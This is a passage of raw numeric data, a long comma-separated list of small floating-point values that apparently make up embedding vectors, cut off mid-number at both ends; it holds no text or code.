508,-0.005329819,0.02457573,0.002129999,0.021701042,0.0171959,-0.0079188775,0.007972544,-0.021851748,-0.0037393442,-0.0038781173,0.012096406,0.011981958,-0.040510245,0.03208231,-0.0011258463,0.016300285,-0.017074455,-0.0017733054,-0.0065706098,0.0006463453,-0.00878243,-0.013793448,0.00211554,0.030084522,0.006123996,-0.01480381,-0.017924737,0.0058614938,-0.0055435686,0.014300376,-0.03304817,0.010185681,-0.004092184,0.016524902,0.005114924,-0.03422265,0.034586474,0.025799133,0.03170284,0.024841944,-0.0010879297,-0.006865796,-0.013454705,0.025601953,-0.0102486415,-0.013491277,-0.021595903,-0.0017631508,-0.005522425,-0.0057173106,0.0020816324,0.01107155,0.0021257198,0.014378214,0.003492712,-0.010349339,-0.0012804241,0.024653893,0.0011080644,0.009367011,0.009158918,-0.018312557,-0.00037810268,-0.008060003,0.024052743,0.010208515,0.015975744,-0.0055531487,-0.011380975,0.024115445,0.02204666,-0.006244863,0.026522687,0.027115833,0.0049815453,0.025626374,-0.0062952028,0.009046308,-0.004045312,-0.008553845,0.00043566566,-0.0052319407,0.006998577,-0.0054608267,-0.009538919,0.0001125439,0.0038611381,0.039089218,-0.014766241,0.014900919,0.015478687,-0.009704812,-0.010904017,-0.022535538,-0.015114485,-0.01595749,-0.009177532,-0.0046655014,0.021275656,0.017969614,0.0065368037,0.0068750326,0.009592806,0.018105201,-0.007966227,-0.02453144,0.0032859014,0.02841807,-0.006628938,0.01129156,-0.00075443,-0.034127537,0.009007253,0.014927897,-0.0028739725,-0.039653853,0.030675236,0.02766354,0.014752714,0.022528306,0.048743386,-0.0021672798,-0.0030482085,0.012332332,0.027652469,-0.0027467015,-0.029942093,-0.0023783876,0.0047808704,-0.0124923345,-0.003398067,0.0034909497,0.0033707411,-0.002192753,0.028449055,-0.0261829,-0.0034773126,0.025536146,0.035266805,-0.024191929,0.007854635,-0.0028257866,0.0019881653,0.038144965,0.011203914,0.046580322,-0.013100192,-0.0017833795,0.00023862535,0.024391644,0.02303181,-0.005986064,0.015239735,-0.035089675,-0.0032707187,-0.0059415963,0.027295252,0.006417355,0.0120164035,-0.022926131,-0.0008930177,-0.008892983,-0.0013808972,-0.0049474677,-0.0034750595,0.003192838,-0.0018386842,-0.0010583124,-0.03237567,-0.0053254664,-0.004789044,0.022340642,-0.0028521696,-0.028669357,-0.017941032,-0.009987902,-0.011430982,0.02935285,-0.0051115686,0.026340147,0.011211023,0.041225158,0.0006526282,0.0006936285,0.024762943,0.0035699669,0.006643151,0.025458243,0.0022265345,0.0153578445,-0.00618346,0.008665328,0.008281441,0.0029571422,-0.010296406,0.010895391,0.013505578,0.0134627,0.013177546,-0.031739853,0.009062936,0.01813184,0.0025326042,-0.023075225,0.019609652,-0.003428145,-0.008941806,-0.00612808,-0.009404957,-0.020068768,-0.01272299,-0.013888681,0.013861462,-0.0064773154,-0.040092517,0.0011866343,0.01372404,-0.015330818,-0.009589695,0.010893587,0.01311471,-0.012615557,0.0016362915,0.00699862,-0.009027031,0.0027979487,0.0040203114,-0.0035542168,-0.020928467,0.01565769,0.022722999,-0.0020520722,-0.011387425,-0.007928634,-0.010789356,0.0007392865,-0.010130513,0.0018521657,-0.004761801,0.019832527,-0.009425933,0.014802513,-0.03951439,0.005460842,0.0066854423,-0.027795352,0.0023672162,-0.025909575,0.032014523,-0.00078145496,-0.011512953,0.010256555,-0.010072411,-0.0029630128,-0.009035656,0.033822242,-0.07033999,-0.006961704,0.005907693,0.008651299,-0.0049614105,0.0153188165,0.02447192,-0.0016119275,0.0026862007,0.00045187134,-0.009300965,-0.000022727607,-0.0011754065,0.011199006,0.019272394,0.0028858974,-0.023025356,-0.004427762,-0.029152371,0.012716575,0.0077854586,0.04067274,0.012103323,0.0076812757,0.010331337,0.01871898,0.00869995,-0.0011067648,-0.0039589987,-0.0591327,-0.0024910688,0.001960817,-0.03275106,0.014627046,0.006805162,-0.0141173005,-0.005679412,-0.015003309,-0.017847866,-0.0008858692,0.008227196,-0.029760392,-0.019733725,0.009442596,-0.011159024,0.026660465,-0.009901275,0.015965313,0.026651934,0.02176235,0.024079576,0.022230139,-0.0044626547,0.028014269,-0.010040799,0.019435652,-0.0042214016,0.016756987,0.011262843,0.002000231,0.004818766,0.0032114654,0.0005695574,-0.0073960987,0.0051829712,0.015472152,0.04595653,0.018347742,-0.0010184238,-0.018852275,0.0125604225,-0.0037099638,0.0032126985,-0.013757289,0.022426909,-0.0012664038,-0.0065099113,0.019424949,0.0027784265,0.02381305,0.008245534,-0.02612556,-0.0020031503,0.025685403,0.007052137,-0.006912168,-0.0046229865,0.0046406365,0.010493453,0.012329945,-0.026829213,0.0075681945,-0.0063847415,-0.013556254,-0.01475291,-0.023256995,0.0026217173,-0.03500582,0.0014385195,0.011656064,0.013163592,-0.007792008,-0.0055280086,-0.02288852,0.014986512,0.009404145,-0.03558227,-0.02490194,0.0079101175,0.017785205,-0.009345057,-0.0017135063,0.01943239,-0.008713694,0.015551039,0.010322211,-0.026405886,0.0025510425,-0.005710768,-0.00022436227,0.018023735,0.003932327,0.029167784,0.02295771,-0.033266768,0.008730127,-0.017179176,-0.0061614397,-0.004422544,0.0066895746,0.026150052,-0.0076471157,-0.018133372,0.009585697,-0.018437812,-0.009854197,0.0027574454,-0.04882363,-0.013724975,0.006075446,0.03644698,-0.0036660165,0.0105232885,-0.0057588774,0.015758667,0.024657851,-0.0076704454,-0.0032905142,-0.0046156356,-0.000096110816,0.023084296,0.028091175,0.01683748,-0.035740376,-0.0063123666,0.029801229,-0.01583425,0.0040769186,-0.008157877,-0.020044012,-0.02877151,-0.030179681,0.005823147,-0.0306368,0.018991714,-0.0072898422,-0.02255419,0.03467733,-0.020361684,0.013197964,0.025702776,-0.006151576,0.017343726,0.00315873,0.011207358,-0.040703796,-0.03087226,0.009348945,-0.002460873,0.018737944,0.025321415,-0.037289873,-0.010156733,-0.020117234,-0.014566636,-0.018199623,0.037476093,0.010458374,-0.000838207,-0.006810858,0.0039456515,0.0027840692,0.004461336,-0.026793316,0.005927983,-0.013267802,-0.0021344658,0.0034161208,0.014605526,-0.031564742,0.021692766,0.019593973,-0.030243231,0.036122862,-0.007430811,0.007832169,-0.00552442,0.01921828,0.0017121535,-0.014342529,0.020227496,0.004287932,-0.0060858065,0.033207733,0.0037291567,0.010970254,-0.020743433,-0.016038425,-0.015898867,-0.009404363,0.011700532,-0.030532781,0.00075763627,0.0062314067,0.0067195892,0.0048544584,-0.005884892,0.024334196,0.0017857075,0.0144436,0.021411775,0.007882232,-0.034963254,-0.000095130075,-0.0031375312,-0.01744285,-0.0033621297,0.0058053816,0.0042465036,0.028840983,0.028276337,-0.010203401,-0.01389686,0.028273651,-0.00019913501,-0.00029914596,0.0011279966,0.00021170611,-0.009112274,-0.0048581455,0.027627857,-0.028627297,-0.019581662,0.0016734813,-0.012483222,0.017381912,-0.007851908,0.0054424396,0.00484502,0.0089599965,0.02387591,-0.003111358,0.0022682769,-0.0112088015,0.016732872,-0.0061260806,0.01372469,0.00977165,0.0019287444,-0.0074361954,0.026742551,-0.013950622,0.0025823351,0.017836358,-0.00488162,-0.0031789616,0.0062488536,0.008913056,0.0024742065,-0.000092163245,-0.002151348,0.0057722153,0.013254939,-0.009354632,0.01081841,-0.021838952,-0.00683757,-0.003975123,-0.016430706,-0.0066573964,-0.007644314,-0.0015872136,0.016214278,-0.010096074,-0.024471963,-0.029429594,-0.057772797,-0.005948848,-0.016002974,-0.006340115,0.0018311108,-0.0036149113,0.019171264,0.006786885,0.019116221,-0.013322616,0.0059837797,0.015143787,0.016842611,0.0034195997,0.010488509,-0.018973427,-0.02564572,0.0060020294,0.028143052,0.014978744,-0.016539447,-0.0088830795,0.007861506,-0.0030634082,0.03855225,0.01854044,-0.014520565,-0.013701634,-0.043011807,-0.005595896,-0.012276199,0.012774469,-0.0189125,-0.012314517,-0.021718148,-0.005048006,0.010756918,0.021972656,-0.0025875843,0.0132259345,-0.015168348,-0.018023685,-0.002869625,0.01567922,-0.0020438624,-0.027886385,0.015106922,0.0013816947,0.0037503405,-0.026362171,0.017012611,-0.006366344,-0.025311528,0.027509497,-0.010213812,0.017055152,-0.005911944,0.026444297,0.018703092,-0.0019068329,0.0068691983,-0.0039709606,0.027212067,0.03042557,-0.019927686,-0.005876905,0.00018946225,0.022155222,-0.014174748,0.004815319,-0.011345689,-0.0028922274,-0.035332464,-0.0030705705,-0.021708481,0.00768818,-0.016439807,-0.007127729,0.006105626,-0.014070223,-0.02255804,0.019750379,-0.02072569,0.0046786857,-0.021964872,-0.012227596,-0.00553063,0.007632811,0.002743248,-0.008509477,-0.0055504213,0.00023776328,-0.0005855424,0.007625187,0.011580562,0.034990486,0.00022183894,0.008155876,-0.00077995204,0.0125402305,0.029879244,-0.0106679,-0.0129835885,0.042199124,0.015992668,0.0009452608,0.016499795,0.025591591,0.043423597,0.03657551,0.009110977,0.017534915,-0.0051052845,0.020370374,0.028014768,0.004327581,-0.00043822842,0.019141642,0.009841009,0.028574446,-0.0013836201,0.009895147,0.012897785,0.01121527,0.00010032744,0.0131367305,0.007684445,0.0041897125,-0.0213662,0.009300505,0.0029497433,0.0006511336,-0.007930715,0.0050759087,0.007324071,0.016991787,-0.0032426207,-0.039034612,-0.009866693,0.0013886552,-0.025693754,-0.0030154956,-0.012354722,-0.011252732,0.0026560053,-0.021520814,0.0026189424,0.011689254,0.0030597383,0.009117027,-0.0046942676,0.02981255,0.016728858,0.0031069785,-0.015293084,0.0059366575,-0.021078115,-0.014603428,0.021109348,0.017296154,0.012625953,-0.024697475,-0.0021905182,-0.0018094681,-0.01984915,0.00394512,-0.015374212,-0.01266684,0.001124444,-0.029340977,-0.003486116,0.022932867,-0.0041444767,0.025855782,0.009904195,-0.023531113,0.024278698,0.009446394,-0.01180781,0.025725327,0.016349347,0.03743202,0.018957112,-0.02181443,-0.0039174394,-0.014444143,-0.021493519,-0.0034703433,-0.011511282,-0.0035453544,0.0058309804,0.0025634516,0.021812193,0.003982524,-0.0084715625,0.036586005,-0.015725102,0.02050493,-0.005742458,-0.016346684,-0.021454444,0.023257663,-0.007909243,0.018614452,-0.01588014,0.025950788,0.0045097773,-0.032650076,-0.007719692,-0.010293242,-0.00908132,-0.016702445,-0.007995899,-0.008369587,-0.017128611,0.014041398,-0.011170783,0.011932104,0.014453726,-0.0064138523,0.0047263107,0.012992179,-0.018498238,0.0060002245,0.013414257,-0.017382111,-0.0028221952,0.009692189,0.015626153,-0.00058417127,0.030164292,-0.014416458,0.016534122,0.025962234,-0.020908095,0.0120366365,0.0027054274,0.0014055126,-0.03618071,-0.002984427,0.009002747,0.015183601,0.0031650718,-0.02091529,-0.0044097225,0.028976826,-0.006423427,-0.018169947,-0.00070797285,-0.0013607708,-0.00073230884,0.018352123,0.007130583,0.020683214,-0.012343704,-0.0034503613,-0.011379907,-0.005511235,-0.009191862,-0.0114875045,-0.013715781,-0.008236916,-0.00252153,0.009748062,-0.015213891,0.010730477,-0.0045757582,0.004835156,0.03799902,-0.006885718,-0.006475401,-0.002817091,0.0028774694,0.022127312,0.002029982,-0.0005410462,-0.01889723,-0.00432196,0.002751702,0.020544877,0.004851339,-0.00021644372,-0.013159348,-0.01350082,-0.0042955424,0.018078515,0.029107243,-0.025886605,0.014330063,0.0035496277,-0.019393211,-0.02570667,-0.0011042259,0.017245505,0.014112067,-0.0069526425,-0.029423758,-0.011234586,-0.0061547407,-0.0253533,0.05251923,-0.0072914422,0.017667633,0.011673533,0.01345294,-0.02708705,0.0073037813,0.01183173,0.002809413,-0.005366254,-0.039097775,-0.013646914,-0.018038902,0.01001066,0.022993615,0.0036182282,0.005231774,0.025788829,-0.010148883,0.017374044,0.0069564325,-0.0001529111,-0.0019047797,0.008877801,0.009455308,0.015177063,0.01004651,-0.010303908,0.003533796,0.013638508,0.007839133,-0.017716762,0.022674628,0.018851882,0.010544512,0.0048180376,0.030641023,-0.0066742077,-0.02835876,0.022296086,-0.020765683,-0.011442804,0.03198872,0.01458325,0.0133684045,-0.012148762,-0.028904496,-0.0139011815,0.009641652,-0.0333126,0.010643741,-0.015163157,0.0010193177,-0.009838381,-0.01776268,0.022872375,-0.005294039,0.02168808,0.038424667,0.0049424283,-0.001913208,0.01387076,0.007411293,-0.0054993844,-0.0038576482,-0.00074620754,0.009870059,-0.012492993,0.02490699,-0.025679136,-0.0016542847,-0.00065178395,-0.0037449673,0.0110301785,0.0011231632,0.012147406,0.015439253,0.0020616818,-0.02140273,-0.023211382,-0.0013947809,0.0043840576,0.044297516,0.0027529045,-0.021074777,-0.0012380112,0.01031594,-0.0016172958,0.034351796,0.014847229,0.019576233,-0.008055214,-0.012970041,0.02800775,-0.013607715,0.019415695,0.0057482356,-0.00038809294,-0.010059481,0.022314372,0.00953103,0.0072565773,0.0038242124,-0.019642005,0.01618101,0.0053504664,0.0031852017,-0.0150676025,0.0049073165,0.054399677,0.0065329103,0.019827012,-0.0064889695,-0.011612045,-0.005364393,0.0037854502,0.013767111,-0.00084796303,-0.0065592304,0.0005165303,0.009989581,0.022163726,-0.024318581,-0.053721063,-0.007139475,0.1459699,0.0056601726,-0.0017057877,0.031182455,-0.0054269964,0.0014576828,-0.17936893,0.002045489,0.0111558195,-0.01682406,-0.002720164,-0.006352251,-0.010399683,0.023912199,0.012462497,0.010391044,-0.008146801,-0.02451687,0.015740879,-0.015550978,-0.0066001643,0.007821387,0.0067358003,0.004297781,-0.01791253,-0.011756019,0.002784108,-0.0058349045,-0.009823165,-0.007873535,0.01532145,-0.000069793685,0.012449391,-0.0040890407,-0.0297561,0.022569986,0.013334387,0.0048724893,-0.022367338,-0.00894448,0.027414918,0.007870194,-0.011032168,-0.041477386,-0.14420967,-0.0031615107,0.022086473,-0.032903817,0.027458971,-0.020579826,-0.025502829,0.0041557727,-0.0036224544,-0.016554207,0.023684656,0.03022588,-0.011242172,-0.011702555,-0.0136621585,0.00021617656,0.0023034445,0.011592146,-0.0071362704,0.0028916723,0.01401299,0.00038003892,-0.012716041,-0.014903474,-0.026926221,0.010166155,-0.0014630737,0.013623752,0.010449014,-0.0048861485,-0.02324576,0.008084589,-0.024445657,0.008527843,-0.01015367,-0.016904136,-0.00013155106,0.012901041,-0.02443434,0.028778508,-0.001356571,0.018958203,-0.015098029,0.007840021,0.009200168,0.013810966,0.018333025,0.02055668,0.017186305,0.009257559,0.024879564,0.010083439,-0.018672984,0.01122879,0.0005417327,0.008178224,-0.012739576,-0.012455751,-0.011301966,0.019857123,0.0018246041,-0.017918367,-0.01743704,0.00826879,0.023802865,-0.002413011,0.004605768,-0.034606516,0.01034627,0.015834888,-0.014253652,-0.0014266561,0.011009537,-0.02395154,0.0048124795,0.018895749,0.0042155525,0.0112399645,0.025483742,-0.0052851927,0.0011743157,0.007187829,-0.0025425924,-0.030606307,0.008263437,-0.0001228316,0.00750019,0.0049120192,0.00883127,0.007314225,0.014837964,-0.006053964,-0.004275671,-0.0015329801,0.03482756,-0.00008905227,0.022076687,-0.0036044004,-0.027489878,0.00097371347,0.005293837,-0.012190962,-0.008228501,0.003589506,-0.019856228,0.017559383,-0.0060168966,-0.021201726,-0.013595205,-0.011248646,0.0064220307,-0.019282678,0.034950662,0.015520841,-0.031081889,-0.020350322,0.0021275054,-0.00027059135,0.013150569,-0.026798138,-0.016026236,0.015740667,-0.01612155,0.0017720968,0.014738736,0.012171243,-0.040800758,-0.0023189806,-0.005091883,0.017600395,-0.015366101,0.014535653,0.004828377,0.029373134,-0.015335654,-0.00865994,-0.009012046,0.00089931366,-0.03312102,-0.017830214,-0.0136068985,0.0044541685,-0.0069226287,0.004815654,-0.000592786,-0.008478098,0.029774796,-0.021117862,0.0217511,0.0019398389,-0.00091827725,0.020207804,-0.02447072,-0.008726727,0.017701926,0.07111867,-0.002925175,-0.003179253,0.016480185,0.007630929,-0.010659939,0.017025644,-0.0154472925,-0.014376547,-0.020460341,-0.034083247,-0.0014617977,-0.0013029746,0.028315013,-0.037236664,0.009660673,0.018305091,0.018235402,-0.001154657,0.009125,0.017536376,0.0053810426,-0.005212192,0.015782097,0.012473201,0.008559919,0.010594746,0.006242485,-0.0066910977,0.011441151,0.013145949,-0.014613939,-0.00684556,-0.00036975322,0.010146688,-0.035429746,-0.005837071,-0.014414752,0.010512558,-0.021649737,0.00051408657,0.004543975,0.017411908,-0.015739001,0.00044264545,-0.018282797,-0.0056456137,-0.006544239,0.02645793,-0.0065359543,0.0038225837,0.019916441,-0.016377399,-0.0011086838,-0.0057263407,-0.012986107,0.0007405067,-0.0044070347,0.006632811,-0.0040692464,0.02386927,-0.021158319,0.00015481793,-0.020713383,-0.006274355,0.024388518,-0.010897929,-0.011681768,0.011567897,0.0031405147,-0.0006729917,0.0012444372,-0.047713976,0.023598006,0.013605504,-0.0010347314,-0.00094658986,-0.002726057,-0.009417053,0.019803507,0.0023050094,0.029747564,0.0056483024,-0.0013921852,0.0051777754,-0.028176768,-0.022084078,0.038815502,-0.03302778,-0.0020410595,0.0030298634,0.0032570716,0.04876559,0.0052751573,0.0219446,0.027115552,0.020307368,0.005493496,0.020089965,-0.00090912875,0.024759552,0.015013678,0.007990935,-0.02686327,-0.010442586,0.011626,-0.008214589,-0.0077901334,0.034095794,-0.004281805,0.0023204114,-0.022642592,0.007141438,-0.02321875,-0.01630953,0.044969715,0.0032199107,0.0061516734,0.029550249,0.004159522,0.00046157467,0.017153215,0.010223589,-0.013149484,0.03681162,-0.032007415,0.007872848,0.016746132,-0.023092996,0.017055318,0.009571508,0.012576609,0.023858335,-0.0067673773,0.007512598,0.005510261,0.01215553,0.0041885786,0.002776688,0.02553069,-0.012220011,-0.014063427,-0.004723383,0.022643324,-0.0030374113,0.010359139,0.0044613383,-0.014893617,-0.019196803,0.009510382,-0.0319666,0.004663616,-0.0016031861,-0.003433118,0.022341825,0.025927616,-0.012436768,-0.012481472,-0.016216937,-0.026135473,0.0016286498,0.02906885,-0.0064071245,-0.008124074,-0.016447771,0.021201635,0.027977487,0.0012972791,0.016016463,0.0012448812,-0.0011682281,-0.0145536205,0.0026120294,-0.00878895,0.004472592,-0.024557488,0.009553674,-0.0011658187,-0.012876092,-0.017067868,0.009230803,0.019847276,0.0034313009,-0.0071030436,0.00467333,0.0013795139,-0.002304313,0.033823613,-0.0347953,0.00863114,-0.0014007257,-0.02215538,0.00092018966,0.007136404,-0.030072497,-0.019513,0.010277722,-0.028285796,-0.007638312,0.0010194439,0.012882366,-0.0026639577,-0.00959227,-0.009430998,0.0053641,-0.009581667,0.0027357626,-0.019964999,-0.0061249756,0.0046277256,-0.024639674,-0.0148809515,-0.0127788065,0.013209747,-0.017740702,-0.012929576,-0.011711034,0.019121537,-0.0001414962,-0.023799326,-0.0010092957,-0.0028989003,0.0118832765,0.0035765285,-0.0044987095,0.0013436676,-0.013079156,0.01365558,-0.022684678,-0.002108084,-0.026367448,0.042247485,0.024525471,0.004819747,-0.0008961832,-0.02579853,-0.029627789,-0.008762394,-0.04392266,-0.009110589,-0.0040026405,-0.030117966,-0.013585493,0.0073946305,-0.012462032,0.0020662337,0.0125654815,0.0131924525,-0.014850656,-0.014859754,0.013671163,-0.005019947,-0.033796325,-0.026313253,0.016709525,-0.012371773,-0.002093015,0.0028887722,-0.008337197,-0.027665239,-0.013610659,-0.022409111,-0.013735893,-0.007943609,-0.008037161,0.01154812,0.02113787,0.040573575,0.017914042,0.014757067,0.0104727,0.0069337613,-0.0012292706,0.009545318,0.0021276507,-0.024533646,0.0038501285,-0.013191576,0.008409787,0.049241845,0.028329486,-0.017902723,0.010607444,-0.0059039956,-0.002330566,-0.009531171,0.0006698104,0.016134188,-0.004317167,-0.009952898,-0.031550836,0.016298441,0.011414529,-0.023046535,-0.021048188,-0.0052673747,-0.002802127,0.0021429833,0.009604219,0.010094268,0.016662221,0.011593586,-0.0076749036,0.018582746,-0.004359538,-0.010364308,0.022843724,0.0067705773,0.013902332,-0.0043132566,-0.0054663415,0.0069515267,0.024325332,-0.008280146,0.020832935,0.002244456,-0.011970286,0.03847265,-0.029434547,0.020937117,0.00047599216,-0.0043055555,-0.008761543,-0.016764315,-0.03778668,-0.00049056846,-0.033816285,-0.0040944605,-0.010058028,-0.009461242,-0.006203418,-0.027055478,0.009322744,-0.10698361,0.0074592065,-0.03144311,-0.017688049,-0.017223973,-0.012371307,-0.0024849384,0.012959973,0.010890955,0.0011216942,-0.004361022,0.027453542,0.00938231,0.009400869,-0.013904222,0.0031663182,-0.031667173,-0.0048662988,-0.015970176,0.00011115006,0.014613973,-0.022579351,0.014587637,-0.009033079,0.005841207,0.003208884,-0.0060453913,0.028354837,0.015185597,0.014019489,-0.0018574924,0.021664485,0.0051590344,0.008877259,0.004331464,-0.0066777747,0.013532383,0.023573754,0.0039893896,0.0053194985,-0.012329364,-0.0070688697,0.004866481,-0.007065735,-0.011616589,-0.012683868,0.0033744366,0.037696537,0.018014949,0.02621732,-0.014796462,0.016951967,0.011148266,-0.0046543786,0.012030721,-0.022254761,0.018853853,0.0020223248,0.021697683,0.017862927,-0.000043959008,-0.00006469048,0.016176503,0.0042894343,0.0077714794,0.017991306,0.0016608774,-0.027526675,-0.02699341,-0.0038923218,-0.0070754285,0.011437578,-0.0021885354,0.012528633,-0.000712178,-0.013405629,0.0006525479,0.0011636852,-0.018726517,0.02050983,-0.023277309,0.006517859,0.0007263659,0.013801089,0.00039104736,-0.012133878,-0.009276713,0.015316722,-0.019083751,-0.0013189069,0.002702533,0.012382722,-0.007807544,-0.01686221,-0.014007166,-0.004728218,0.0006977796,0.015620415,-0.0056042406,-0.0054879542,-0.02054603,-0.0018882786,-0.006027348,-0.015980843,-0.13167596,-0.008959814,0.005198418,0.0016555934,0.008334753,-0.0066344705,0.0067054154,0.0071051456,0.043673743,0.00046262986,-0.013085906,0.015920643,-0.029540954,0.008117051,-0.0002922212,0.0051328028,-0.03548678,-0.0011986685,-0.009703368,-0.0056938073,-0.009402069,-0.02709281,0.01031845,0.00447143,0.00008787346,0.014916603,0.017173044,0.04204408,0.016539237,-0.0036008798,0.0018691157,0.013470181,-0.016742479,-0.01000353,-0.036496475,0.004460529,0.0024083673,-0.011797766,0.0004921461,0.029756306,-0.0021336137,-0.01474839,0.012241785,0.014530129,-0.003588063,-0.006951424,-0.0057126014,0.02217324,-0.007816299,-0.0060505564,0.0050155125,-0.016414674,0.01257205,-0.00098353,0.0073325336,-0.007791583,-0.009974896,0.009720527,0.0062331855,0.011148121,-0.003025136,0.003584418,-0.0039107813,-0.0011082843,0.007884331,0.012765308,0.002912626,-0.0055240947,0.0016718424,0.007315811,-0.0026891192,0.03189894,0.015014357,-0.014404238,0.0228968,0.003129884,0.00438032,0.02566784,0.02565555,0.0026808372,0.002382443,-0.018790497,-0.003764788,0.010467164,-0.038111944,0.00020338122,-0.0064642355,-0.0049009384,-0.008316334,0.012408591,0.023236409,0.0006739846,-0.0024081862,0.020302942,0.01965875,0.010708389,0.024786776,-0.010099834,-0.02754964,-0.012548166,0.0019956362,-0.004863923,-0.00972884,0.020518271,-0.012703919,0.025122086,0.020498682,0.004100138,-0.017753175,-0.00896696,-0.004606886,0.03595756,-0.021777367,0.007106519,-0.011965288,0.00070261635,-0.01851059,0.014620403,-0.025143748,0.012314037,0.0022929716,0.0059295944,0.0031464838,-0.022395976,-0.00698904,-0.0031110363,-0.016948584,0.016763376,0.0023109461,-0.024751991,0.002851167,-0.0020526168,0.0006804624,-0.0020854652,0.002402296,0.019156534,-0.017041385,0.0031258832,0.023694472,0.014050763,0.003938929,-0.014077767,0.00008407159,-0.011002454,0.00055676315,0.012186612,-0.027381748,-0.01691848,-0.00016274005,0.012008106,-0.0027608215,-0.018262729,0.021883499,-0.007799732,0.014012288,0.007989843,-0.024273718,0.012899841,-0.0069104545,0.028656824,0.0017943213,-0.0062387045,0.046451688,0.009573062,-0.0013447396,-0.007195351,-0.002121845,-0.0048262863,-0.009493613,0.0123004075,-0.0098383,-0.003334615,0.0069900635,-0.0432809,-0.003305654,0.014529514,0.020091945,0.013890617,0.039775595,0.029368332,-0.00879861,0.0031692034,-0.015190425,-0.015046788,-0.0060449345,0.016680636,-0.0030591185,-0.0049391156,-0.0017031915,0.008468705,0.041227598,0.015371834,-0.016644185,-0.008025604,-0.0020034085,0.00036743586,0.0016565822,0.014970922,0.0022928675,-0.00860429,-0.018222328,-0.0013901157,0.011453405,-0.008132184,0.008982595,0.01856597,0.0039678444,-0.0018483718,0.00065730145,-0.01295374,-0.017465029,0.018477194,0.00042122722,-0.0073591843,0.017044304,0.014616344,0.0050573116,-0.037257086,0.0022697463,-0.0023377186,-0.0177269,-0.0033918603,0.0092986375,-0.0024114973,-0.0019202633,0.027726138,0.017490298,0.0141020715,-0.03863658,-0.026738323,-0.027338801,-0.006240763,-0.022037989,-0.011898751,-0.005544896,-0.0012638305,0.01121147,-0.00044132286,0.012862942,0.012064741,0.022913402,0.019442009,0.029073836,0.027813742,0.011686289,-0.001526111,0.017910155,0.017136922,0.009491937,0.039947726,-0.0055166916,0.00583321,0.0062824013,-0.010730718,-0.0075026043,0.0046661235,-0.0031202084,0.019333582,0.0037295192,-0.0058369967,-0.021763818,-0.0056944564,-0.019998599,-0.012412937,0.012025275,-0.007715372,-0.007048763,-0.01299076,-0.008809403,-0.011152769,0.010211536,0.014075792,-0.026159393,0.023354566,-0.026475985,-0.016735287,-0.007044287,0.011342824,0.0071891635,0.0045596384,-0.0093755135,-0.013085399,0.0006293322,0.007690789,-0.009898819,-0.0011597038,-0.010970692,0.0056042103,-0.025483454,-0.0005865976,0.018821899,0.0036687793,-0.026812349,-0.0017648995,-0.011768834,0.0066956156,0.011870916,0.00950627,0.001290614,0.009014434,0.005801323,0.00067703536,0.0074018575,0.018936526,0.0007472288,0.011894688,-0.0055689123,0.034962002,0.017443307,-0.010822044,-0.01521951,0.00541359,-0.017788628,0.0072649512,0.028207086,-0.008996128,-0.0002515755,-0.010295226,-0.022550609,-0.010220907,-0.007747986,-0.0056309556,-0.015493694,0.0013558925,0.008036724,0.012272968,0.002192149,0.041078262,-0.017778907,-0.023266757,0.016440023,-0.012011558,-0.00024502605,0.0083974,0.0102245,0.012572897,0.011888457,0.03566393,-0.01971084,0.018501349,0.020269277,0.008612867,-0.004731875,-0.0063649234,-0.0012496543,0.013772201,-0.009881677,0.010579617,0.013742977,-0.0037395554,-0.013972347,0.011501398,-0.009730395,-0.02113222,-0.03647661,0.019326778,-0.053846464,-0.00094267895,-0.0021429723,-0.001445558,-0.0068716174,-0.005497772,-0.009500275,-0.014621774,-0.0068685357,-0.008923033,-0.01658482,0.01604146,-0.028721604,-0.0021306812,-0.02407075,0.018497458,-0.021747487,-0.026384074,-0.0061183535,-0.0978373,-0.026064133,0.007068001,-0.0025844867,0.0443577,0.007914914,-0.015924536,-0.0012827491,-0.004220617,0.014528963,0.007083195,0.01214056,-0.019867394,0.015266524,0.035428397,-0.0061912043,-0.0050600804,-0.0005535981,-0.023504715,-0.034323275,0.006470583,0.006321388,-0.018541556,0.00035680537,0.017418003,-0.01617049,0.00025154385,-0.009384327,-0.008251178,-0.010225818,-0.004765159,-0.0037381223,-0.011253529,-0.012822144,0.0023171266,0.014499031,-0.010173506,0.0067811683,-0.03168428,-0.02060068,-0.0075571532,-0.0019382435,-0.006558169,0.0059373374,-0.03156235,0.01835169,-0.0023285465,0.008236488,0.0012358458,-0.0006483506,0.0010133812,0.012439802,0.010908497,0.014336806,0.0017159038,0.012749617,-0.0007841012,-0.006312682,0.021702815,0.0011053443,-0.010965294,0.004090885,0.002080565,0.0014484491,-0.011670634,-0.001507769,0.0049239574,0.015656013,-0.0021585969,0.0065476494,-0.006295153,-0.018880434,0.0002508605,-0.017288892,-0.00705765,-0.012706083,0.003138475,-0.02054696,-0.027001461,0.012198526,0.05505082,-0.015824512,0.010632623,-0.0019760684,-0.001493043,0.021798085,-0.0062037883,-0.011066361,0.038549136,0.00093395525,-0.028139573,-0.012081313,0.016636427,-0.01018756,0.0067037414,0.011632784,0.0044494243,0.012375786,-0.0042175394,-0.0043965047,0.00023831334,0.00872842,-0.011733204,-0.008548945,-0.016916227,-0.0006362174,0.0013161425,0.004963127,0.010918199,-0.01389759,0.0027296294,0.015599475,0.016787305,0.054209802,0.00564447,0.005378266,-0.004641151,0.023588423,-0.0008018474,-0.030743713,-0.005437537,-0.01613073,-0.019254139,0.01941364,0.018859593,-0.0042925794,0.016674152,-0.007783801,-0.018156853,0.0006420804,-0.0017705436,0.016041866,0.02296139,0.0017869889,-0.002752589,-0.00266372,-0.012783086,0.026054505,-0.002331658,0.028413564,-0.006339561,-0.011921173,0.02360901,0.003358723,-0.017876152,0.045582,-0.022143275,0.0027250096,-0.004690637,-0.032047078,0.0014697011,-0.005765398,0.0020175746,-0.009500225,-0.0033601192,-0.015558471,0.008803683,0.003187567,-0.04159919,-0.0071891937,-0.010227323,-0.0014897627,0.028222475,-0.008087594,-0.018847419,-0.007448607,0.018003386,-0.011492744,0.00561555,0.0057770708,-0.008531487,-0.011042744,-0.01354528,-0.010479749,-0.017634004,-0.0034376236,0.022900054,0.041297097,-0.009512751,0.015431462,-0.020112405,0.01793826,-0.017120829,-0.006302027,-0.017167374,-0.016360026,0.009809403,0.0056275185,0.0105502615,-0.01932911,0.0012140702,0.0050213067,0.0012154699,-0.0020326672,0.0048738075,-0.0018316503,0.011485198,-0.0047610705,-0.019129258,0.0012322622,-0.014162719,0.012677867,-0.011242614,0.015529988,0.020958625,0.004956998,0.009836349,0.021324834,-0.013338831,-0.0035099236,-0.015350097,0.0070997155,0.025258359,0.124796316,-0.006789213,-0.019189827,-0.00191293,0.008075765,-0.0028768976,0.007997359,-0.0035210068,0.015095136,0.00717745,0.